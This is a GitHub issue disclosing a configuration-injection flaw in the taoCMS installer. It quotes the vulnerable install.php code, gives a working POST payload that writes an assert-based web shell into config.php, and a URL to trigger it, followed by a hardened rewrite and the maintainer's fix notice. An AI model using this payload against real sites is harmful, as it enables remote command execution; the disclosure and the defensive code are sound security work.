taogogo / taocms

taoCMS is an incredibly tiny CMS (Content Management System), written in PHP, that supports MySQL/SQLite as the database (MIT License)

one can insert malicious code in the installation process to get a web shell #1

Closed. jadacheng closed this issue 3 years ago

jadacheng commented 5 years ago

In the CMS installation process, the configuration file filtering is not rigorous; you can insert malicious code during installation to execute arbitrary commands and even get a webshell. Source: ./install.php:234-238

    // install.php (vulnerable code as reported): the existing define() lines in
    // config.php are patched with str_replace(), and each raw POST value is
    // dropped verbatim between the single quotes of a PHP string literal.
    $configs=file_get_contents('config.php');
    $_POST['tb']&&$configs=str_replace('define(\'TB\',  \''.TB.'\');','define(\'TB\',   \''.$_POST['tb'].'\');',$configs);
    $_POST['db']&&$configs=str_replace('define(\'DB\',  \''.DB.'\');','define(\'DB\',   \''.$_POST['db'].'\');',$configs);
    $_POST['db_name']&&$configs=str_replace('define(\'DB_NAME\',    \''.DB_NAME.'\');','define(\'DB_NAME\', \''.$_POST['db_name'].'\');',$configs);
    // no escaping or validation happens before the patched file is written back
    file_put_contents('config.php',$configs);

payload:

/taocms-master/install.php [POST]db=Mysql&db_name=%7C127.0.0.1%3A3306%7Croot%7Croot%7Cwity%7C');assert($_REQUEST['cmd']);//&tb=test&Submit=%E7%82%B9%E5%87%BB%E6%AD%A4%E5%A4%84%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85%E5%85%8D%E8%B4%B9%E5%BC%80%E6%BA%90%E7%9A%84taoCMS%E7%B3%BB%E7%BB%9F


exploit: http://127.0.0.1/taocms-master/config.php?cmd=phpinfo();

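For comparison, here is what a hardened version of the quoted installer step looks like. This is an added example, not taocms code and not the fix shipped in 3.0.1: it validates the POST fields against an allow-list, regenerates config.php from scratch with `var_export()` instead of splicing raw values into the file with `str_replace()`, and refuses to run again once an install lock exists. The function names, the `install.lock` path, the driver names `Mysql`/`Sqlite`, and the reading of DB_NAME as a `|`-separated connection string (inferred from the payload above) are assumptions made for this example.

```php
<?php
// Added example (not taocms code): hardened shape of the install.php step
// quoted in the report. Function names, the lock-file path, the driver names
// and the '|'-separated DB_NAME layout are assumptions for this example.

declare(strict_types=1);

const INSTALL_LOCK = __DIR__ . '/install.lock';   // assumed lock-file path

/**
 * Validate the installer's POST fields against an allow-list.
 * Returns constant name => value, or throws on anything unexpected.
 */
function validate_install_settings(array $post): array
{
    $driver = $post['db'] ?? '';
    if (!in_array($driver, ['Mysql', 'Sqlite'], true)) {     // assumed driver names
        throw new InvalidArgumentException('unsupported database driver');
    }

    // Table prefix: identifier characters only, bounded length.
    $prefix = $post['tb'] ?? '';
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // DB_NAME in the report looks like "|host:port|user|pass|dbname|". Quotes,
    // backslashes, parentheses, semicolons and control characters have no
    // business in any of those fields, so they are rejected outright.
    $dbName = $post['db_name'] ?? '';
    if (strlen($dbName) > 255 || preg_match('/[\'"\\\\();\x00-\x1f]/', $dbName)) {
        throw new InvalidArgumentException('invalid database connection string');
    }

    return ['DB' => $driver, 'DB_NAME' => $dbName, 'TB' => $prefix];
}

/**
 * Render config.php from scratch. var_export() emits a correctly quoted PHP
 * string literal (quotes and backslashes escaped), so a value can never close
 * the literal and append code the way the str_replace() version allowed.
 */
function render_config(array $settings): string
{
    $out = "<?php\n// generated by the installer; do not edit by hand\n";
    foreach ($settings as $name => $value) {
        if (!preg_match('/^[A-Z_][A-Z0-9_]*$/', $name)) {
            throw new InvalidArgumentException("bad constant name: $name");
        }
        $out .= sprintf("define('%s', %s);\n", $name, var_export((string) $value, true));
    }
    return $out;
}

/**
 * Write the rendered config atomically and drop the install lock, so the
 * installer cannot be replayed after deployment to rewrite config.php.
 */
function write_config(string $path, string $contents): void
{
    if (file_exists(INSTALL_LOCK)) {
        throw new RuntimeException('installation already completed');
    }
    $tmp = tempnam(dirname($path), 'cfg');
    if ($tmp === false || file_put_contents($tmp, $contents) === false) {
        throw new RuntimeException('could not write config');
    }
    chmod($tmp, 0640);
    if (!rename($tmp, $path)) {
        unlink($tmp);
        throw new RuntimeException('could not install config');
    }
    touch(INSTALL_LOCK);
}

// Installer entry point: the POST comes from the install form.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    try {
        $settings = validate_install_settings($_POST);
        write_config(__DIR__ . '/config.php', render_config($settings));
        echo 'installed';
    } catch (Throwable $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Two properties matter here. First, even if the allow-list in `validate_install_settings()` were loosened, `var_export()` would turn a value such as `');assert(...);//` into the literal `'\');assert(...);//'`, which is just a string inside `define()` and never executes. Second, the install lock closes the window the report relies on: an installer that can be re-run against a deployed site is a config-rewrite primitive regardless of how carefully it escapes its values, so detection should also alert on any POST to `install.php` after go-live and on changes to `config.php` outside a deployment.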

taogogo commented 3 years ago

3.0.1 fixed, thanks for your contribution
